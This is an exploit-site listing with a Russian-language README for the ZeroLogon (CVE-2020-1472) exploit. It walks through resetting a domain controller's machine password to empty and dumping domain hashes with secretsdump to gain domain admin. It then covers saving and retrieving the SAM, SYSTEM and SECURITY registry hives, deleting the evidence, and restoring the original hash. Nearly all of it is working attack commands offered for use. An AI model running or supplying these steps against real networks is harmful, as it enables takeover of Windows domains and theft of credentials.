Sploitus

Exploit for zerologon

kitploit · 2026-08-25

Exploit Code

MARKDOWN54 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-RISKSENSE-ZEROLOGON
# Эксплойт ZeroLogon

Код эксплойта основан на https://www.secura.com/blog/zero-logon и https://github.com/SecuraBV/CVE-2020-1472. Оригинальное исследование и сканер от Secura, модификации от RiskSense Inc.

Для эксплуатации удалите все предыдущие установки Impacket и установите Impacket из https://github.com/SecureAuthCorp/impacket/commit/b867b21 или новее. Затем выполните:

root@kitploit:~
    
    
    python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR
    

Если это успешно, вы затем сможете:

root@kitploit:~
    
    
    secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'DOMAIN/DC_NETBIOS_NAME$@dc_ip_addr'
    

что должно дать вам права администратора домена. После этого используйте wmiexec.py для доступа к целевому контроллеру домена с учетными данными из secretsdump и выполните

root@kitploit:~
    
    
    reg save HKLM\SYSTEM system.save
    reg save HKLM\SAM sam.save
    reg save HKLM\SECURITY security.save
    get system.save
    get sam.save
    get security.save
    del /f system.save
    del /f sam.save
    del /f security.save
    

Затем вы можете

root@kitploit:~
    
    
    secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
    

И это должно показать вам исходный NT-хеш учетной записи компьютера. Затем вы можете восстановить этот исходный хеш учетной записи компьютера в домене с помощью

root@kitploit:~
    
    
    python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH
    

Восстановление исходного хеша необходимо для нормальной работы контроллера домена.